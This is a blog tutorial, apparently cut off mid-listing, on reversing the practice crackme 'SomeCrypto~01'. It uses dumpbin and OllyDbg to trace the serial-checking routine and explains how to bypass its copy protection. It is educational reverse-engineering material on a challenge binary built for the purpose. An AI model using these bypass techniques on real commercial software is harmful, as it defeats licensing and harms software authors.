pHere I'm going to show you how to crack a href="http://crackmes.de/users/san01suke/somecrypto01/" target="_blank"this/a crackme. We'll use some basic reversing techniques to figure out how it works and how to break or bypass its copy protection./p pSome knowledge of IA-32 assembly would be beneficial to understand what is going on but I'll try to explain it in enough detail that you should be able to follow anyway./p !-- more -- h2Prerequisites/h2 pIf you want to follow along the setup is:/p ul li32bit Windows 7 Home Edition installed inside a VMware virtual machine/li lia href="http://www.ollydbg.de/" target="_blank"OllyDBG/a installed/li lia href="https://www.microsoft.com/en-gb/download/details.aspx?id=40787" target="_blank"Microsoft Visual Studio Express 2013 for Windows Desktop/a installed and 'VC/bin/' in the PATH variable/li /ul h2Initial Look/h2 pAfter you download the zip file and look inside it you should seee this:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/zip-file.png"/p pDrag the folder they are sitting in to the desktop and run codeSomeCrypto~01.exe/code by double clicking on it./p pYou should see a rather intimidating window with no explaination like this:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/somecrypto1-run.png"/p pTry to put some junk input in the 2 fields but nothing happens:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/somecrypto1-input.png"/p pLet's close this, it tells us nothing, and have a closer look at the binary itself./p pOne of the first things you should always look at is the strongimports/strong section of the binary, it tells you what functions are being imported by the application from other libraries (a href="http://support.microsoft.com/kb/815065" target="_blank".dll files/a)./p pThis tells you a lot about the application and there are nearly always imports because the application has to communicate with the OS./p pcodedumpbin/code is an application that comes with codeMicrosoft Visual Studio Express 2013 for Windows Desktop/code and on my test machine resides in codeC:\Program Files\Microsoft Visual Studio 12\VC\bin\/code./p pIt can be used to look at some of the sections in a href="https://en.wikipedia.org/wiki/Portable_Executable" target="_blank"PE executables/a./p pOpen up a command prompt with admin privileges:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/admin-cmd.png" width="800"/p pAnd run the command codedumpbin /imports "C:\Users\user\Desktop\SomeCrypto~01\SomeCrypto~01.exe"/code./p pThe location of the crackme file might be different depending on what your local username is for Windows (mine is codeuser/code) and if you extracted it to somewhere other than the desktop./p pYou should see an output like this:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/span span class="code-line"span class="normal"50/span/span span class="code-line"span class="normal"51/span/span span class="code-line"span class="normal"52/span/span span class="code-line"span class="normal"53/span/span span class="code-line"span class="normal"54/span/span span class="code-line"span class="normal"55/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go"Microsoft (R) COFF/PE Dumper Version 12.00.21005.1/span/span span class="code-line"span class="go"Copyright (C) Microsoft Corporation. All rights reserved./span/span span class="code-line"/span span class="code-line"/span span class="code-line"span class="go"Dump of file C:\Users\user\Desktop\SomeCrypto~01\SomeCrypto~01.exe/span/span span class="code-line"/span span class="code-line"span class="go"File Type: EXECUTABLE IMAGE/span/span span class="code-line"/span span class="code-line"span class="go" Section contains the following imports:/span/span span class="code-line"/span span class="code-line"span class="go" KERNEL32.dll/span/span span class="code-line"span class="go" 402018 Import Address Table/span/span span class="code-line"span class="go" 4024F4 Import Name Table/span/span span class="code-line"span class="go" 0 time date stamp/span/span span class="code-line"span class="go" 0 Index of first forwarder reference/span/span span class="code-line"/span span class="code-line"span class="go" 215 GetModuleHandleA/span/span span class="code-line"/span span class="code-line"span class="go" USER32.dll/span/span span class="code-line"span class="go" 402020 Import Address Table/span/span span class="code-line"span class="go" 4024FC Import Name Table/span/span span class="code-line"span class="go" 0 time date stamp/span/span span class="code-line"span class="go" 0 Index of first forwarder reference/span/span span class="code-line"/span span class="code-line"span class="go" 20E MessageBoxA/span/span span class="code-line"span class="go" 121 GetDC/span/span span class="code-line"span class="go" 265 ReleaseDC/span/span span class="code-line"span class="go" 114 GetClientRect/span/span span class="code-line"span class="go" 2BB SetTimer/span/span span class="code-line"span class="go" DC EndPaint/span/span span class="code-line"span class="go" DA EndDialog/span/span span class="code-line"span class="go" 1EE LoadImageA/span/span span class="code-line"span class="go" 129 GetDlgItemTextA/span/span span class="code-line"span class="go" AB DialogBoxParamA/span/span span class="code-line"span class="go" 28F SetDlgItemTextA/span/span span class="code-line"span class="go" E BeginPaint/span/span span class="code-line"/span span class="code-line"span class="go" GDI32.dll/span/span span class="code-line"span class="go" 402000 Import Address Table/span/span span class="code-line"span class="go" 4024DC Import Name Table/span/span span class="code-line"span class="go" 0 time date stamp/span/span span class="code-line"span class="go" 0 Index of first forwarder reference/span/span span class="code-line"/span span class="code-line"span class="go" 1FB GetObjectA/span/span span class="code-line"span class="go" 13 BitBlt/span/span span class="code-line"span class="go" E6 DeleteObject/span/span span class="code-line"span class="go" 277 SelectObject/span/span span class="code-line"span class="go" 30 CreateCompatibleDC/span/span span class="code-line"/span span class="code-line"span class="go" Summary/span/span span class="code-line"/span span class="code-line"span class="go" 1000 .data/span/span span class="code-line"span class="go" 1000 .rdata/span/span span class="code-line"span class="go" 69000 .rsrc/span/span span class="code-line"span class="go" 1000 .text/span/span span class="code-line"/code/pre/div /td/tr/table pThis shows us the functions that are being imported and which dll file each function is in./p pThe first thing that stands out to me is the call to codeMessageBoxA/code on line 25./p pThese challenges normally create a message box saying "Success" or something when you have done it so a call to this might be where in the application we want to get to./p pAnd once we are there we should be able to trace back through the code to see where the check was done./p pThe second thing I notice is the call to codeGetDlgItemTextA/code on line 33./p pThis function looks like it could be responsible for getting our input, if this is true we could follow the code from that point and find the code that checks our input and the success code./p h2Digging A Little Deeper/h2 pWe can ignore the rest for now and go straight to opening the application in OllyDBG. Open Olly with administrator privileges:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/olly-admin.png" width="800"/p pClick emFile-gt;Open/em and choose the codeSomeCrypto~01.exe/code file:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/open-crackme-olly.png" width="800"/p pYou should then see this:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/olly-open.png" width="800"/p pThe big section in the top left is the main disassembly window, this shows the disassembly of the application from the a href="https://en.wikipedia.org/wiki/Entry_point" target="_blank"entry point/a of the application (code004012DE/code), this is where execution of the application starts and these are the CPU instructions that are going to run./p pWe can check this using codedumpbin/code with the following command: codedumpbin /headers "C:\Users\user\Desktop\SomeCrypto~01\SomeCrypto~01.exe" | find /i "entry point"/code/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go" 12DE entry point (004012DE)/span/span span class="code-line"/code/pre/div /td/tr/table pThe columns are from left to right, the memory address of the instruction, the hex representation of the instruction, the ia-32 assembly representation and finally notes that Olly puts there for us./p pThe top right section contains the values of the a href="https://en.wikipedia.org/wiki/Processor_register" target="_blank"CPU registers/a, these are used primarily as storage for the CPU while it is running instructions. There are a couple of special ones which I'll explain if I need to./p pThe format is: code[CPU register name] [value] [Olly notes]/code/p pThe bottom right section is the a href="https://en.wikipedia.org/wiki/Stack_%28abstract_data_type%29" target="_blank"stack/a window and shows the current status of the stack, the stack is used to store function arguments and local variables as well as a few other things./p pThe columns are from left to right, memory address, 4 byte hex value at that memory address, Olly notes/p pThe bottom left section is the dump window and can be used to dump certain bits of memory to see what is there./p pThe dump window has titles for its columns./p pLet's see if there are any interesting strings in here, right click anywhere and click on emSearch for-gt;All referenced text strings/em:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/olly-look-for-strings.png" width="800"/p pYou should see the strings window with 4 entries:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/olly-strings-window.png" width="800"/p pThe third entry down looks promising (strongSuccess/strong)./p pLet's have a look where in the application this is, right click on it and click emFollow in Disassembler/em:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/olly-follow-string.png" width="800"/p pYou should see something like this:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/olly-serial-check-call.png" width="800"/p pAs you can see the function call is to codeMessageBoxA/code, this is where we want to end up./p pJust above the function call are the instructions that decide whether or not the bit of code that calls codeMessageBoxA/code is run (strongI've highlighted the relevant rows/strong)./p h2Understanding The Authentication Logic/h2 pThis is basically just calling some internal function at code00401000/code then using the return value to decide whether or not to jump to code004012CA/code. If the return value is code0/code the jump happens./p pThis is the code at code004012CA/code:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="x"004012CA |gt; 5F POP EDI/span/span span class="code-line"span class="x"004012CB |. 5E POP ESI/span/span span class="code-line"span class="x"004012CC |. 33C0 XOR EAX,EAX/span/span span class="code-line"span class="x"004012CE |. 5B POP EBX/span/span span class="code-line"span class="x"004012CF |. 8BE5 MOV ESP,EBP/span/span span class="code-line"span class="x"004012D1 |. 5D POP EBP/span/span span class="code-line"span class="x"004012D2 \. C2 1000 RETN 10/span/span span class="code-line"/code/pre/div /td/tr/table pIt just exits so we don't want to end up here, this is the fail case./p pLet's look inside this function to see what it does, right click on the function call (at code0040129D/code) and click emFollow/em:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/olly-check-function-menu.png" width="800"/p pYou should see this:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/olly-crypt-function.png" width="800"/p pThis is the function that decides if our name and/or serial are correct. Here is the full disassembly:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/span span class="code-line"span class="normal"50/span/span span class="code-line"span class="normal"51/span/span span class="code-line"span class="normal"52/span/span span class="code-line"span class="normal"53/span/span span class="code-line"span class="normal"54/span/span span class="code-line"span class="normal"55/span/span span class="code-line"span class="normal"56/span/span span class="code-line"span class="normal"57/span/span span class="code-line"span class="normal"58/span/span span class="code-line"span class="normal"59/span/span span class="code-line"span class="normal"60/span/span span class="code-line"span class="normal"61/span/span span class="code-line"span class="normal"62/span/span span class="code-line"span class="normal"63/span/span span class="code-line"span class="normal"64/span/span span class="code-line"span class="normal"65/span/span span class="code-line"span class="normal"66/span/span span class="code-line"span class="normal"67/span/span span class="code-line"span class="normal"68/span/span span class="code-line"span class="normal"69/span/span span class="code-line"span class="normal"70/span/span span class="code-line"span class="normal"71/span/span span class="code-line"span class="normal"72/span/span span class="code-line"span class="normal"73/span/span span class="code-line"span class="normal"74/span/span span class="code-line"span class="normal"75/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="x"00401000 $ 55 PUSH EBP/span/span span class="code-line"span class="x"00401001 . 8BEC MOV EBP,ESP/span/span span class="code-line"span class="x"00401003 . 8A01 MOV AL,BYTE PTR DS:[ECX]/span/span span class="code-line"span class="x"00401005 . 83EC 20 SUB ESP,20/span/span span class="code-line"span class="x"00401008 . 56 PUSH ESI/span/span span class="code-line"span class="x"00401009 . 33F6 XOR ESI,ESI/span/span span class="code-line"span class="x"0040100B . 84C0 TEST AL,AL/span/span span class="code-line"span class="x"0040100D . 0F84 B3000000 JE SomeCryp.004010C6/span/span span class="code-line"span class="x"00401013 . 8D55 E0 LEA EDX,DWORD PTR SS:[EBP-20]/span/span span class="code-line"span class="x"00401016 . 2BD1 SUB EDX,ECX/span/span span class="code-line"span class="x"00401018 gt; 3C 61 CMP AL,61/span/span span class="code-line"span class="x"0040101A . 0F8C A6000000 JL SomeCryp.004010C6/span/span span class="code-line"span class="x"00401020 . 3C 7A CMP AL,7A/span/span span class="code-line"span class="x"00401022 . 0F8F 9E000000 JG SomeCryp.004010C6/span/span span class="code-line"span class="x"00401028 . 88040A MOV BYTE PTR DS:[EDX+ECX],AL/span/span span class="code-line"span class="x"0040102B . 8A41 01 MOV AL,BYTE PTR DS:[ECX+1]/span/span span class="code-line"span class="x"0040102E . 41 INC ECX/span/span span class="code-line"span class="x"0040102F . 46 INC ESI/span/span span class="code-line"span class="x"00401030 . 84C0 TEST AL,AL/span/span span class="code-line"span class="x"00401032 .^75 E4 JNZ SHORT SomeCryp.00401018/span/span span class="code-line"span class="x"00401034 . 83FE 1A CMP ESI,1A/span/span span class="code-line"span class="x"00401037 . 0F85 89000000 JNZ SomeCryp.004010C6/span/span span class="code-line"span class="x"0040103D . 33C0 XOR EAX,EAX/span/span span class="code-line"span class="x"0040103F . 90 NOP/span/span span class="code-line"span class="x"00401040 gt; 8A88 10304000 MOV CL,BYTE PTR DS:[EAX+403010]/span/span span class="code-line"span class="x"00401046 . 8888 40314000 MOV BYTE PTR DS:[EAX+403140],CL/span/span span class="code-line"span class="x"0040104C . 40 INC EAX/span/span span class="code-line"span class="x"0040104D . 84C9 TEST CL,CL/span/span span class="code-line"span class="x"0040104F .^75 EF JNZ SHORT SomeCryp.00401040/span/span span class="code-line"span class="x"00401051 . 33C9 XOR ECX,ECX/span/span span class="code-line"span class="x"00401053 . 380D 40314000 CMP BYTE PTR DS:[403140],CL/span/span span class="code-line"span class="x"00401059 . 74 2D JE SHORT SomeCryp.00401088/span/span span class="code-line"span class="x"0040105B . EB 03 JMP SHORT SomeCryp.00401060/span/span span class="code-line"span class="x"0040105D 8D49 00 LEA ECX,DWORD PTR DS:[ECX]/span/span span class="code-line"span class="x"00401060 gt; 8A81 40314000 MOV AL,BYTE PTR DS:[ECX+403140]/span/span span class="code-line"span class="x"00401066 . 3C 61 CMP AL,61/span/span span class="code-line"span class="x"00401068 . 7C 14 JL SHORT SomeCryp.0040107E/span/span span class="code-line"span class="x"0040106A . 3C 7A CMP AL,7A/span/span span class="code-line"span class="x"0040106C . 7F 10 JG SHORT SomeCryp.0040107E/span/span span class="code-line"span class="x"0040106E . 0E PUSH CS/span/span span class="code-line"span class="x"0040106F . BE C08A9405 MOV ESI,5948AC0/span/span span class="code-line"span class="x"00401074 . 7F FF JG SHORT SomeCryp.00401075/span/span span class="code-line"span class="x"00401076 FF DB FF/span/span span class="code-line"span class="x"00401077 FF DB FF/span/span span class="code-line"span class="x"00401078 . 8891 40314000 MOV BYTE PTR DS:[ECX+403140],DL/span/span span class="code-line"span class="x"0040107E gt; 41 INC ECX/span/span span class="code-line"span class="x"0040107F . 80B9 40314000 gt;CMP BYTE PTR DS:[ECX+403140],0/span/span span class="code-line"span class="x"00401086 .^75 D8 JNZ SHORT SomeCryp.00401060/span/span span class="code-line"span class="x"00401088 gt; 83C8 FF OR EAX,FFFFFFFF/span/span span class="code-line"span class="x"0040108B . BA 40314000 MOV EDX,SomeCryp.00403140/span/span span class="code-line"span class="x"00401090 . 85C9 TEST ECX,ECX/span/span span class="code-line"span class="x"00401092 . 74 19 JE SHORT SomeCryp.004010AD/span/span span class="code-line"span class="x"00401094 gt; 0FB632 MOVZX ESI,BYTE PTR DS:[EDX]/span/span span class="code-line"span class="x"00401097 . 33F0 XOR ESI,EAX/span/span span class="code-line"span class="x"00401099 . 81E6 FF000000 AND ESI,0FF/span/span span class="code-line"span class="x"0040109F . C1E8 08 SHR EAX,8/span/span span class="code-line"span class="x"004010A2 . 3304B5 5820400gt;XOR EAX,DWORD PTR DS:[ESI*4+402058]/span/span span class="code-line"span class="x"004010A9 . 42 INC EDX/span/span span class="code-line"span class="x"004010AA . 49 DEC ECX/span/span span class="code-line"span class="x"004010AB .^75 E7 JNZ SHORT SomeCryp.00401094/span/span span class="code-line"span class="x"004010AD gt; F7D0 NOT EAX/span/span span class="code-line"span class="x"004010AF . 3D 18B291F8 CMP EAX,F891B218/span/span span class="code-line"span class="x"004010B4 . 75 10 JNZ SHORT SomeCryp.004010C6/span/span span class="code-line"span class="x"004010B6 . 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]/span/span span class="code-line"span class="x"004010B9 . C700 40314000 MOV DWORD PTR DS:[EAX],SomeCryp.00403140/span/span span class="code-line"span class="x"004010BF . B0 01 MOV AL,1/span/span span class="code-line"span class="x"004010C1 . 5E POP ESI/span/span span class="code-line"span class="x"004010C2 . 8BE5 MOV ESP,EBP/span/span span class="code-line"span class="x"004010C4 . 5D POP EBP/span/span span class="code-line"span class="x"004010C5 . C3 RETN/span/span span class="code-line"span class="x"004010C6 gt; 32C0 XOR AL,AL/span/span span class="code-line"span class="x"004010C8 . 5E POP ESI/span/span span class="code-line"span class="x"004010C9 . 8BE5 MOV ESP,EBP/span/span span class="code-line"span class="x"004010CB . 5D POP EBP/span/span span class="code-line"span class="x"004010CC . C3 RETN/span/span span class="code-line"/code/pre/div /td/tr/table pHere I will go over this code in detail and try to understand what it is doing./p pFirst it starts with the function prologue:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="x"00401000 $ 55 PUSH EBP/span/span span class="code-line"span class="x"00401001 . 8BEC MOV EBP,ESP/span/span span class="code-line"/code/pre/div /td/tr/table pThis is common among all stdcall and cdecl functions, it just sets up the stack frame (for more information about stack frames check out the "Stack Frames" section of my post on a href="/x86-32-linux/reverse-engineering/2014/07/01/basic-binary-auditing/"basic binary auditing/a)./p pThe next instruction is interesting:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="x"00401003 . 8A01 MOV AL,BYTE PTR DS:[ECX]/span/span span class="code-line"/code/pre/div /td/tr/table pThis is using the ECX register before anything has been done to it in this function. This means that whatever is stored in ECX was stored there in the calling function and it was passed as an argument to this current function./p pThe reason it was passed in a register instead of on the stack (how arguments are normally passed) is because the compiler knew it was in control of all points of entry into this function./p pThe most likely way that the compiler would have known this is if the function was explicitly defined with the strongstatic/strong keyword. This means that only functions inside the same source file can call this function./p pTo figure out what is stored in ECX at this point in the application without running it, we will need to look back through the code that called this function, here is that code:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="x"00401267 |. 8B3D 40204000 MOV EDI,DWORD PTR DS:[lt;amp;USER32.GetDlgItemTextAgt;] ; USER32.GetDlgItemTextA/span/span span class="code-line"span class="x"0040126D |. 6A 40 PUSH 40 ; /Count = 40 (64.)/span/span span class="code-line"span class="x"0040126F |. 8D8C24 C4000000 LEA ECX,DWORD PTR SS:[ESP+C4] ; |/span/span span class="code-line"span class="x"00401276 |. 51 PUSH ECX ; |Buffer/span/span span class="code-line"span class="x"00401277 |. 68 E9030000 PUSH 3E9 ; |ControlID = 3E9 (1001.)/span/span span class="code-line"span class="x"0040127C |. 56 PUSH ESI ; |hWnd/span/span span class="code-line"span class="x"0040127D |. FFD7 CALL EDI ; \GetDlgItemTextA/span/span span class="code-line"span class="x"0040127F |. 6A 40 PUSH 40 ; /Count = 40 (64.)/span/span span class="code-line"span class="x"00401281 |. 8D9424 84000000 LEA EDX,DWORD PTR SS:[ESP+84] ; |/span/span span class="code-line"span class="x"00401288 |. 52 PUSH EDX ; |Buffer/span/span span class="code-line"span class="x"00401289 |. 68 EA030000 PUSH 3EA ; |ControlID = 3EA (1002.)/span/span span class="code-line"span class="x"0040128E |. 56 PUSH ESI ; |hWnd/span/span span class="code-line"span class="x"0040128F |. FFD7 CALL EDI ; \GetDlgItemTextA/span/span span class="code-line"span class="x"00401291 |. 8D4424 0C LEA EAX,DWORD PTR SS:[ESP+C]/span/span span class="code-line"span class="x"00401295 |. 50 PUSH EAX/span/span span class="code-line"span class="x"00401296 |. 8D8C24 84000000 LEA ECX,DWORD PTR SS:[ESP+84]/span/span span class="code-line"span class="x"0040129D |. E8 5EFDFFFF CALL SomeCryp.00401000/span/span span class="code-line"/code/pre/div /td/tr/table pAs you can see there are 2 calls to codeGetDlgItemTextA/code and we have 2 fields (Name and Serial). But at this time we don't know which field is which however we do have their ID's./p pThe prototype for codeGetDlgItemTextA/code is:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="n"UINT/spanspan class="w" /spanspan class="n"WINAPI/spanspan class="w" /spanspan class="n"GetDlgItemText/spanspan class="p"(/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"_In_/spanspan class="w" /spanspan class="n"HWND/spanspan class="w" /spanspan class="n"hDlg/spanspan class="p",/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"_In_/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"nIDDlgItem/spanspan class="p",/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"_Out_/spanspan class="w" /spanspan class="n"LPTSTR/spanspan class="w" /spanspan class="n"lpString/spanspan class="p",/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"_In_/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"nMaxCount/spanspan class="w"/span/span span class="code-line"span class="p");/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pAnd from the a href="http://msdn.microsoft.com/en-gb/library/windows/desktop/ms645489%28v=vs.85%29.aspx" target="_blank"manual page/a for it:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="go"hDlg [in]/span/span span class="code-line"span class="go" Type: HWND/span/span span class="code-line"span class="go" A handle to the dialog box that contains the control./span/span span class="code-line"span class="go"nIDDlgItem [in]/span/span span class="code-line"span class="go" Type: int/span/span span class="code-line"span class="go" The identifier of the control whose title or text is to be retrieved./span/span span class="code-line"span class="go"lpString [out]/span/span span class="code-line"span class="go" Type: LPTSTR/span/span span class="code-line"span class="go" The buffer to receive the title or text./span/span span class="code-line"span class="go"nMaxCount [in]/span/span span class="code-line"span class="go" Type: int/span/span span class="code-line"span class="go" The maximum length, in characters, of the string to be copied to the buffer pointed to by lpString. If the length of the string, including the null character, exceeds the limit, the string is truncated./span/span span class="code-line"/code/pre/div /td/tr/table pSo the second argument is the ID of the field and the third is the buffer that the text is going to be stored in./p pThis means that we are looking for the control with ID 3EA. Line 16 (on the disassembly of the 2 calls to codeGetDlgItemTextA/code above) shows that ECX is being loaded with the address of ESP+84, just before ESP+84 is loaded as the buffer argument to codeGetDlgItemTextA/code with an ID of 3EA./p pIf you remember back to when we used codedumpbin/code to list all of the imported functions, there was also a function called codeSetDlgItemTextA/code being imported./p pThis function is likely used to set the values to "Enter you name..." and "Enter your serial...". We can use this to figure out which of these ID's (code3E9/code or code3EA/code) is the serial field and which is the name field; and ultimately which is being passed to our checking function in ECX./p pWe could use the strings window again and find out where "Enter you name..." and "Enter your serial..." are referenced but I'll show you a different way to find them using the function name (codeSetDlgItemTextA/code)./p pFirst close OllyDBG, open it again and open the crackme again so that you get to this point again:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/olly-open.png" width="800"/p pRight click anywhere and click emSearch for-gt;All intermodular calls/em:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/olly-calls-menu.png" width="800"/p pAfter that, this window should pop up:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/olly-calls-window.png"/p pYou can see the second and third entries are calls to codeSetDlgItemTextA/code, looking at the addresses on the left these calls are right next to each other./p pRight click on 1 of them and click emFollow in Disassembler/em or press emEnter/em:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/olly-calls-follow.png" width="800"/p pYou should see this:/p pimg src="/assets/images/reverse-engineering/an-easy-windows-crackme/olly-setdlgitemtexta-calls.png" width="800"/p pHere is the disassembly of these calls:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/span span class="code-line"span class="normal"8/span/span span class="code-line"span class="normal"9/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="x"00401116 |. 8B3D 48204000 MOV EDI,DWORD PTR DS:[lt;amp;USER32.SetDlgItegt;; USER32.SetDlgItemTextA/span/span span class="code-line"span class="x"0040111C |. 68 60244000 PUSH SomeCryp.00402460 ; /Text = quot;Enter your name...quot;/span/span span class="code-line"span class="x"00401121 |. 68 E9030000 PUSH 3E9 ; |ControlID = 3E9 (1001.)/span/span span class="code-line"span class="x"00401126 |. 56 PUSH ESI ; |hWnd/span/span span class="code-line"span class="x"00401127 |. FFD7 CALL EDI ; \SetDlgItemTextA/span/span span class="code-line"span class="x"00401129 |. 68 74244000 PUSH SomeCryp.00402474 ; /Text = quot;Enter your serial...quot;/span/span span class="code-line"span class="x"0040112E |. 68 EA030000 PUSH 3EA ; |ControlID = 3EA (1002.)/span/span span class="code-line"span class="x"00401133 |. 56 PUSH ESI ; |hWnd/span/span span class="code-line"span class="x"00401134 |. FFD7 